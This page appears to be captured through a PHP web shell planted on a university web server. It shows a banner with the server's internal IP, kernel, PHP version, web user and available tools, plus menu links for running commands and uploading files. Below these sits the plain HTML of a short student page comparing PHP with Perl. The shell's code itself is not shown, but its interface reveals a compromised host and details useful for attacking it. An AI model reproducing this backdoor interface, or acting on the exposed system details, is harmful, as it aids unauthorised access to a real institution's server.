Server IP : 172.16.15.8 / Your IP : 18.117.192.64 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/tasantos/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<html> <head> <title>More on PHP</title> </head> <body bgcolor="pink"> <h1>More on PHP</h1> If you have ever used programming languages such as <i>Perl, C, or C++</i>, many of the features of PHP will be familiar. <br><br>In particular, you might notice some similarity to Perl with features such as <ul> <li>Regular expressions </li> <li>Associative arrays </li> <li>File I/O </li> </ul> <br> <center><A HREF = "index.html"> Back to homepage </A></center> <br> </body> </html>